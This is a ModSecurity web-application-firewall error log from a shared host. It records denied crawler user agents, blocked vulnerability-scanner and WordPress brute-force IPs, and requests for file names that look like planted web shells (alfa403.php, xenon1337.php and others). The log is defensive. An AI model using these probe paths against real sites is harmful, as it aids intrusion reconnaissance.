[Tue May 26 18:26:59.778114 2026] [security2:error] [pid 998632:tid 998827] [client 185.191.171.8:12570] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-22-26/day/2024-10-28/"] [unique_id "ahWYm61OTU2dW0MS1Emx9QAAACM"]
[Tue May 26 18:26:59.778258 2026] [security2:error] [pid 998632:tid 998827] [client 185.191.171.8:12570] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-22-26/day/2024-10-28/"] [unique_id "ahWYm61OTU2dW0MS1Emx9QAAACM"]
[Tue May 26 18:27:00.033065 2026] [security2:error] [pid 998632:tid 998915] [client 20.5.101.115:7870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/xx.php"] [unique_id "ahWYnK1OTU2dW0MS1Emx-QAAAHY"]
[Tue May 26 18:27:00.333965 2026] [security2:error] [pid 998632:tid 998823] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYmq1OTU2dW0MS1EmxywAAAB8"]
[Tue May 26 18:27:00.350446 2026] [security2:error] [pid 998632:tid 998842] [client 20.151.112.53:9177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWYnK1OTU2dW0MS1Emx-gAAADA"]
[Tue May 26 18:27:00.350557 2026] [security2:error] [pid 998632:tid 998842] [client 20.151.112.53:9177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWYnK1OTU2dW0MS1Emx-gAAADA"]
[Tue May 26 18:27:00.974073 2026] [security2:error] [pid 998632:tid 998890] [client 20.5.101.115:7839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYnK1OTU2dW0MS1Emx-wAAAF0"]
[Tue May 26 18:27:01.608630 2026] [security2:error] [pid 998632:tid 998904] [client 20.48.248.215:44928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-link-snpm.php"] [unique_id "ahWYna1OTU2dW0MS1EmyFgAAAGs"]
[Tue May 26 18:27:01.608735 2026] [security2:error] [pid 998632:tid 998904] [client 20.48.248.215:44928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-link-snpm.php"] [unique_id "ahWYna1OTU2dW0MS1EmyFgAAAGs"]
[Tue May 26 18:27:01.630704 2026] [security2:error] [pid 998632:tid 998858] [client 20.5.101.115:12005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/y.php"] [unique_id "ahWYna1OTU2dW0MS1EmyGQAAAEA"]
[Tue May 26 18:27:01.631442 2026] [security2:error] [pid 998632:tid 998919] [client 20.151.112.53:9213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWYna1OTU2dW0MS1EmyGgAAAHo"]
[Tue May 26 18:27:01.631512 2026] [security2:error] [pid 998632:tid 998919] [client 20.151.112.53:9213] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWYna1OTU2dW0MS1EmyGgAAAHo"]
[Tue May 26 18:27:02.191001 2026] [security2:error] [pid 998632:tid 998854] [client 20.151.112.53:9210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWYnq1OTU2dW0MS1EmyJQAAADw"]
[Tue May 26 18:27:02.191113 2026] [security2:error] [pid 998632:tid 998854] [client 20.151.112.53:9210] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWYnq1OTU2dW0MS1EmyJQAAADw"]
[Tue May 26 18:27:03.026663 2026] [security2:error] [pid 998632:tid 998871] [client 20.151.112.53:9193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWYn61OTU2dW0MS1EmyMgAAAEw"]
[Tue May 26 18:27:03.026787 2026] [security2:error] [pid 998632:tid 998871] [client 20.151.112.53:9193] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWYn61OTU2dW0MS1EmyMgAAAEw"]
[Tue May 26 18:27:03.382568 2026] [security2:error] [pid 998632:tid 998820] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYna1OTU2dW0MS1EmyCwAAABw"]
[Tue May 26 18:27:03.467745 2026] [security2:error] [pid 998632:tid 998890] [client 20.151.112.53:9162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWYn61OTU2dW0MS1EmyPgAAAF0"]
[Tue May 26 18:27:03.467844 2026] [security2:error] [pid 998632:tid 998890] [client 20.151.112.53:9162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/ingfo.php"] [unique_id "ahWYn61OTU2dW0MS1EmyPgAAAF0"]
[Tue May 26 18:27:03.959296 2026] [security2:error] [pid 998632:tid 998811] [client 20.48.248.215:13949] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/xminie.php"] [unique_id "ahWYn61OTU2dW0MS1EmyQgAAABQ"]
[Tue May 26 18:27:03.959416 2026] [security2:error] [pid 998632:tid 998811] [client 20.48.248.215:13949] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/xminie.php"] [unique_id "ahWYn61OTU2dW0MS1EmyQgAAABQ"]
[Tue May 26 18:27:04.621723 2026] [security2:error] [pid 998632:tid 998911] [client 20.151.112.53:9211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWYoK1OTU2dW0MS1EmyZAAAAHI"]
[Tue May 26 18:27:04.621834 2026] [security2:error] [pid 998632:tid 998911] [client 20.151.112.53:9211] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/c55cdler.php"] [unique_id "ahWYoK1OTU2dW0MS1EmyZAAAAHI"]
[Tue May 26 18:27:05.189282 2026] [security2:error] [pid 998632:tid 998893] [client 14.245.189.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYn61OTU2dW0MS1EmyNQAAAGA"]
[Tue May 26 18:27:05.470965 2026] [security2:error] [pid 998632:tid 998871] [client 20.151.112.53:9166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWYoa1OTU2dW0MS1EmybQAAAEw"]
[Tue May 26 18:27:05.471091 2026] [security2:error] [pid 998632:tid 998871] [client 20.151.112.53:9166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/error_log.php"] [unique_id "ahWYoa1OTU2dW0MS1EmybQAAAEw"]
[Tue May 26 18:27:05.928391 2026] [security2:error] [pid 998632:tid 998875] [client 20.48.248.215:22731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/bal.php"] [unique_id "ahWYoa1OTU2dW0MS1EmydAAAAFA"]
[Tue May 26 18:27:05.928495 2026] [security2:error] [pid 998632:tid 998875] [client 20.48.248.215:22731] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/bal.php"] [unique_id "ahWYoa1OTU2dW0MS1EmydAAAAFA"]
[Tue May 26 18:27:06.530378 2026] [security2:error] [pid 998632:tid 998844] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYoK1OTU2dW0MS1EmySQAAADI"]
[Tue May 26 18:27:07.377185 2026] [security2:error] [pid 998632:tid 998916] [client 20.151.112.53:9185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWYo61OTU2dW0MS1EmykAAAAHc"]
[Tue May 26 18:27:07.377300 2026] [security2:error] [pid 998632:tid 998916] [client 20.151.112.53:9185] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/xenon1337.php"] [unique_id "ahWYo61OTU2dW0MS1EmykAAAAHc"]
[Tue May 26 18:27:07.696823 2026] [security2:error] [pid 998632:tid 998865] [client 20.151.112.53:9189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWYo61OTU2dW0MS1EmylAAAAEc"]
[Tue May 26 18:27:07.696907 2026] [security2:error] [pid 998632:tid 998865] [client 20.151.112.53:9189] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/alfa403.php"] [unique_id "ahWYo61OTU2dW0MS1EmylAAAAEc"]
[Tue May 26 18:27:08.509584 2026] [security2:error] [pid 998632:tid 998853] [client 20.151.112.53:9110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWYpK1OTU2dW0MS1EmypQAAADs"]
[Tue May 26 18:27:08.509704 2026] [security2:error] [pid 998632:tid 998853] [client 20.151.112.53:9110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/test11.php"] [unique_id "ahWYpK1OTU2dW0MS1EmypQAAADs"]
[Tue May 26 18:27:08.579169 2026] [security2:error] [pid 998632:tid 998873] [client 124.43.5.103:63243] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYpK1OTU2dW0MS1EmyoQAAAE4"]
[Tue May 26 18:27:08.579345 2026] [security2:error] [pid 998632:tid 998873] [client 124.43.5.103:63243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYpK1OTU2dW0MS1EmyoQAAAE4"]
[Tue May 26 18:27:09.254759 2026] [security2:error] [pid 998632:tid 998868] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYoq1OTU2dW0MS1EmyfwAAAEo"]
[Tue May 26 18:27:09.451542 2026] [security2:error] [pid 998632:tid 998824] [client 20.151.112.53:9107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWYpa1OTU2dW0MS1EmytQAAACA"]
[Tue May 26 18:27:09.451672 2026] [security2:error] [pid 998632:tid 998824] [client 20.151.112.53:9107] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/koala.php"] [unique_id "ahWYpa1OTU2dW0MS1EmytQAAACA"]
[Tue May 26 18:27:10.710121 2026] [security2:error] [pid 998632:tid 998874] [client 20.48.248.215:23816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/drykl.php"] [unique_id "ahWYpq1OTU2dW0MS1Emy2AAAAE8"]
[Tue May 26 18:27:10.710216 2026] [security2:error] [pid 998632:tid 998874] [client 20.48.248.215:23816] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/drykl.php"] [unique_id "ahWYpq1OTU2dW0MS1Emy2AAAAE8"]
[Tue May 26 18:27:10.765452 2026] [security2:error] [pid 998632:tid 998891] [client 20.151.112.53:9187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWYpq1OTU2dW0MS1Emy2QAAAF4"]
[Tue May 26 18:27:10.765560 2026] [security2:error] [pid 998632:tid 998891] [client 20.151.112.53:9187] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahWYpq1OTU2dW0MS1Emy2QAAAF4"]
[Tue May 26 18:27:11.617816 2026] [security2:error] [pid 998632:tid 998834] [client 20.48.248.215:33715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/av.php"] [unique_id "ahWYp61OTU2dW0MS1Emy5AAAACk"]
[Tue May 26 18:27:11.617939 2026] [security2:error] [pid 998632:tid 998834] [client 20.48.248.215:33715] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/av.php"] [unique_id "ahWYp61OTU2dW0MS1Emy5AAAACk"]
[Tue May 26 18:27:11.857539 2026] [security2:error] [pid 998632:tid 998916] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYpa1OTU2dW0MS1EmyvgAAAHc"]
[Tue May 26 18:27:12.469082 2026] [security2:error] [pid 998632:tid 998909] [client 20.151.112.53:9155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWYqK1OTU2dW0MS1Emy-gAAAHA"]
[Tue May 26 18:27:12.469203 2026] [security2:error] [pid 998632:tid 998909] [client 20.151.112.53:9155] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahWYqK1OTU2dW0MS1Emy-gAAAHA"]
[Tue May 26 18:27:12.591271 2026] [security2:error] [pid 998632:tid 998918] [client 20.48.248.215:44982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/11.php"] [unique_id "ahWYqK1OTU2dW0MS1EmzAQAAAHk"]
[Tue May 26 18:27:12.591357 2026] [security2:error] [pid 998632:tid 998918] [client 20.48.248.215:44982] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/11.php"] [unique_id "ahWYqK1OTU2dW0MS1EmzAQAAAHk"]
[Tue May 26 18:27:13.123407 2026] [security2:error] [pid 998632:tid 998901] [client 20.151.112.53:9163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzEAAAAGg"]
[Tue May 26 18:27:13.123526 2026] [security2:error] [pid 998632:tid 998901] [client 20.151.112.53:9163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzEAAAAGg"]
[Tue May 26 18:27:13.412694 2026] [security2:error] [pid 998632:tid 998848] [client 20.48.248.215:44968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/77.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzGgAAADY"]
[Tue May 26 18:27:13.412828 2026] [security2:error] [pid 998632:tid 998848] [client 20.48.248.215:44968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/77.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzGgAAADY"]
[Tue May 26 18:27:13.551426 2026] [security2:error] [pid 998632:tid 998921] [client 20.151.112.53:9182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzGwAAAHw"]
[Tue May 26 18:27:13.551524 2026] [security2:error] [pid 998632:tid 998921] [client 20.151.112.53:9182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzGwAAAHw"]
[Tue May 26 18:27:13.916855 2026] [security2:error] [pid 998632:tid 998792] [client 85.11.167.49:62871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/phpinfo.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzIgAAAAE"]
[Tue May 26 18:27:14.175647 2026] [security2:error] [pid 998632:tid 998843] [client 85.11.167.49:63009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/test.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzJwAAADE"]
[Tue May 26 18:27:14.180298 2026] [security2:error] [pid 998632:tid 998732] [remote 14.161.17.36:50814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYqa1OTU2dW0MS1EmzIwAAe0w"]
[Tue May 26 18:27:14.263970 2026] [security2:error] [pid 998632:tid 998915] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYqK1OTU2dW0MS1Emy8wAAAHY"]
[Tue May 26 18:27:14.349870 2026] [security2:error] [pid 998632:tid 998854] [client 20.151.112.53:9165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.wphotonics.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahWYqq1OTU2dW0MS1EmzKwAAADw"]
